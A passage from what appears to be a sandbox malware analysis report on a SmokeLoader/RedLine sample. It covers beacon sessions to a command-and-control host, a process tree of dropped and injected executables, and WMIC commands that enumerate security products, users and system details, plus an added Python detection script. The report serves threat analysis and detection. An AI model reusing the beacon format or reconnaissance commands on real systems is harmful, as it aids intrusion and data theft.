2024-10-08 01:17:34 UTC | 109 | OUT | Data Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
Data Ascii: rmh9/2p6 )6IP g3iqH[CLk4%<2eQvb%;=j ,
2024-10-08 01:17:34 UTC | 285 | IN | HTTP/1.1 404 Not Found
Date: Tue, 08 Oct 2024 01:17:34 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 7
Content-Type: text/html; charset=utf-8
Connection: close
2024-10-08 01:17:34 UTC | 7 | IN | Data Raw: 03 00 00 00 1e 0d af
Data Ascii:


Session ID:25
Source IP:192.168.2.4
Source Port:50067
Destination IP:23.145.40.168
Destination Port:443
PID:2580
Process:C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:17:51 UTC | 285 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://hoxyxvpdayru.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 109
Host: ninjahallnews.com
2024-10-08 01:17:51 UTC | 109 | OUT | Data Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
Data Ascii: rmh9/2p6 )6IP g3iqH[CLk4%<2eQvb%;=j ,
2024-10-08 01:17:52 UTC | 285 | IN | HTTP/1.1 404 Not Found
Date: Tue, 08 Oct 2024 01:17:52 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 7
Content-Type: text/html; charset=utf-8
Connection: close
2024-10-08 01:17:52 UTC | 7 | IN | Data Raw: 03 00 00 00 1e 0d af
                                                                                                                                      Data Ascii:
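Taken together, sessions 21 to 25 show the beacon shape a detection engineer would key on: a POST to /search.php on ninjahallnews.com issued by explorer.exe (PID 2580, the process the loader injected into), an IE11-style User-Agent, a Referer naming a different random-looking domain every time, a body declared as application/x-www-form-urlencoded that is actually raw bytes (the identical 109-byte blob in sessions 21, 23, 24 and 25; a 241-byte variant in session 22), and a 404 whose 7-byte body is a 4-byte little-endian length (3) followed by exactly 3 bytes rather than an HTML error page. One caveat: the report lists these sessions on destination port 443 yet shows plaintext HTTP; whether the sandbox decrypted TLS or the server speaks plain HTTP on 443 is not stated here. The following Python script is an added example, not part of the Joe Sandbox report and not the malware's code: it re-types the session 21 and 23 requests and the 404 response as constructed sample input and runs those heuristics over them. The indicator names, the three-indicator threshold, the benign control request and the example.test domain are assumptions of this example.

```python
"""Heuristic triage of decrypted HTTP sessions for SmokeLoader-style beacons.

Constructed example, not part of the sandbox report. The request headers,
body bytes and the 404 response are re-typed from sessions 21 and 23
(Host ninjahallnews.com, PID 2580 explorer.exe); indicator names, the
threshold and the benign control request are assumptions of this example.
"""
import hashlib
import struct
from urllib.parse import urlsplit

# Bytes a genuine application/x-www-form-urlencoded body is built from.
FORM_CHARSET = set(
    b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~*+%&="
)


def parse_http(raw: bytes):
    """Split a raw HTTP message into (start line, lowercased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def request_indicators(raw: bytes):
    """Return the names of the beacon heuristics a request trips, in fixed order."""
    start, hdr, body = parse_http(raw)
    method, path, _ = start.split(" ", 2)
    hits = []
    if method == "POST" and path.endswith(".php"):
        hits.append("post_to_php")
    ctype = hdr.get("content-type", "")
    if ctype.startswith("application/x-www-form-urlencoded") and any(
        b not in FORM_CHARSET for b in body
    ):
        hits.append("binary_body_declared_as_form")  # ciphertext, not key=value pairs
    ref_host = urlsplit(hdr.get("referer", "")).hostname or ""
    if ref_host and ref_host != hdr.get("host", ""):
        hits.append("decoy_referer")  # Referer domain unrelated to the Host header
    ua = hdr.get("user-agent", "")
    if "Trident/7.0" in ua and "rv:11.0" in ua:
        hits.append("ie11_user_agent")  # weak alone, strong with the others
    return hits


def response_indicators(raw: bytes):
    """Flag a 404 whose body is a small length-prefixed blob rather than HTML."""
    start, hdr, body = parse_http(raw)
    hits = []
    if start.split(" ")[1] == "404" and body and not body.lstrip().startswith(b"<"):
        hits.append("non_html_404_body")
    if len(body) >= 4 and struct.unpack("<I", body[:4])[0] == len(body) - 4:
        hits.append("u32le_length_prefixed_body")  # 03 00 00 00 + 3 payload bytes
    return hits


def body_fingerprint(raw: bytes) -> str:
    """SHA-256 of the request body: one blob reused across decoy Referers stands out."""
    return hashlib.sha256(parse_http(raw)[2]).hexdigest()


def analyze_session(req: bytes, resp: bytes) -> dict:
    hits = request_indicators(req) + response_indicators(resp)
    return {"indicators": hits, "fingerprint": body_fingerprint(req), "suspicious": len(hits) >= 3}


# --- constructed sample input, re-typed from the report's sessions 21 and 23 ---
BEACON_BODY = bytes.fromhex(
    "72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5"
    " 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4"
    " ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5"
    " 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4"
)


def make_request(referer: str, body: bytes) -> bytes:
    head = (
        "POST /search.php HTTP/1.1\r\n"
        "Connection: Keep-Alive\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Accept: */*\r\n"
        f"Referer: {referer}\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Host: ninjahallnews.com\r\n\r\n"
    )
    return head.encode() + body


RESPONSE_404 = (
    b"HTTP/1.1 404 Not Found\r\nServer: Apache/2.4.52 (Ubuntu)\r\n"
    b"X-Frame-Options: DENY\r\nX-Content-Type-Options: nosniff\r\n"
    b"Content-Length: 7\r\nContent-Type: text/html; charset=utf-8\r\nConnection: close\r\n\r\n"
    b"\x03\x00\x00\x00\x1e\x0d\xae"
)
SESSION_21 = make_request("https://qotplnnnyldonj.net/", BEACON_BODY)
SESSION_23 = make_request("https://jcipjgavjhg.org/", BEACON_BODY)
# Benign control (constructed): a real form post with a same-site Referer.
BENIGN = (
    b"POST /login.php HTTP/1.1\r\nHost: example.test\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\nReferer: https://example.test/login\r\n"
    b"User-Agent: curl/8.0\r\nContent-Length: 13\r\n\r\nuser=a&pass=b"
)

if __name__ == "__main__":
    for name, req in (("21", SESSION_21), ("23", SESSION_23)):
        print(name, analyze_session(req, RESPONSE_404))
    print("benign", request_indicators(BENIGN))
```

Running it prints the indicator list per session and the same body fingerprint for sessions 21 and 23 despite their different Referers. The earlier 404 for /index.php in this report, whose body begins with <!DOCTYPE, would not trip non_html_404_body, which is why the check looks at the body rather than the status code. Any single indicator here is noisy (post_to_php fires on the benign control too); the combination, plus one body hash recurring under rotating decoy Referers, is what separates this traffic from ordinary form posts.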


                                                                                                                                      Target ID:0
                                                                                                                                      Start time:21:13:53
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Users\user\Desktop\ctMI3TYXpX.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\ctMI3TYXpX.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:454'144 bytes
                                                                                                                                      MD5 hash:A27775738FAFF754DCF5C3E8E42B9838
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1726159167.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1726254840.00000000004F1000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1726176567.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1726176567.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1726400088.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1726400088.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:1
                                                                                                                                      Start time:21:13:59
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                                                      Imagebase:0x7ff72b770000
                                                                                                                                      File size:5'141'208 bytes
                                                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:5
                                                                                                                                      Start time:21:14:19
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\jghruer
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\jghruer
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:454'144 bytes
                                                                                                                                      MD5 hash:A27775738FAFF754DCF5C3E8E42B9838
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.1977011876.0000000000581000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1977659662.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1977659662.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.1976888383.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1976909715.0000000000540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1976909715.0000000000540000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 29%, ReversingLabs
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:6
                                                                                                                                      Start time:21:14:55
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\35DB.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\35DB.exe
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:453'632 bytes
                                                                                                                                      MD5 hash:366910063EF4A518B6ADF6D28C7B2C69
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2327173692.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2327201404.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2327201404.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2327352814.0000000000731000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2327352814.0000000000731000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2327481392.0000000000771000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:8
                                                                                                                                      Start time:21:15:19
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\hdhruer
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\hdhruer
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:453'632 bytes
                                                                                                                                      MD5 hash:366910063EF4A518B6ADF6D28C7B2C69
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.2574353685.00000000004A0000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2576258561.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2576258561.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.2576079643.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2576150006.0000000001FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2576150006.0000000001FB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:21:15:34
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\B972.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\B972.exe
                                                                                                                                      Imagebase:0x7ff6f2d60000
                                                                                                                                      File size:78'336 bytes
                                                                                                                                      MD5 hash:65AEAA0A0849CB3CE9BC15BCBF0B7B9F
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:10
                                                                                                                                      Start time:21:15:34
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                      Imagebase:0x7ff75b410000
                                                                                                                                      File size:69'632 bytes
                                                                                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:11
                                                                                                                                      Start time:21:15:36
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:cmd
                                                                                                                                      Imagebase:0x7ff76e480000
                                                                                                                                      File size:289'792 bytes
                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:12
                                                                                                                                      Start time:21:15:36
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:13
                                                                                                                                      Start time:21:15:37
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      Imagebase:0x7ff70f330000
                                                                                                                                      File size:4'514'184 bytes
                                                                                                                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:14
                                                                                                                                      Start time:21:15:37
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
                                                                                                                                      Imagebase:0x7ff6bda00000
                                                                                                                                      File size:576'000 bytes
                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:15
                                                                                                                                      Start time:21:15:38
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\explorer.exe
                                                                                                                                      Imagebase:0x7ff72b770000
                                                                                                                                      File size:5'141'208 bytes
                                                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:16
                                                                                                                                      Start time:21:15:39
                                                                                                                                      Start date:07/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      Imagebase:0x150000
                                                                                                                                      File size:4'514'184 bytes
                                                                                                                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:17
Start time: 21:15:39
Start date: 07/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Imagebase: 0x7ff6bda00000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 18
Start time: 21:15:40
Start date: 07/10/2024
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\explorer.exe
Imagebase: 0x7ff72b770000
File size: 5'141'208 bytes
MD5 hash: 662F4F92FDE3557E86D110526BB578D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000012.00000002.4123114957.0000000000771000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited: false

Target ID: 19
Start time: 21:15:41
Start date: 07/10/2024
Path: C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\explorer.exe
Imagebase: 0x150000
File size: 4'514'184 bytes
MD5 hash: DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 20
Start time: 21:15:41
Start date: 07/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
Imagebase: 0x7ff72bec0000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 21
Start time: 21:15:42
Start date: 07/10/2024
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\explorer.exe
Imagebase: 0x7ff72b770000
File size: 5'141'208 bytes
MD5 hash: 662F4F92FDE3557E86D110526BB578D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 22
Start time: 21:15:43
Start date: 07/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Imagebase: 0x7ff6bda00000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 21:15:46
Start date: 07/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Imagebase: 0x7ff6bda00000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 21:15:49
Start date: 07/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Imagebase: 0x7ff6bda00000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 25
Start time: 21:15:51
Start date: 07/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Imagebase: 0x7ff6bda00000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 26
Start time: 21:15:53
Start date: 07/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Imagebase: 0x7ff6bda00000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 21:15:55
Start date: 07/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Imagebase: 0x7ff6bda00000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 28
Start time: 21:16:01
Start date: 07/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Imagebase: 0x7ff6bda00000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 29
Start time: 21:16:04
Start date: 07/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
Imagebase: 0x7ff6bda00000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 30
Start time: 21:16:08
Start date: 07/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Imagebase: 0x7ff6bda00000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 31
Start time: 21:16:11
Start date: 07/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
Imagebase: 0x7ff6bda00000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 32
Start time: 21:16:15
Start date: 07/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
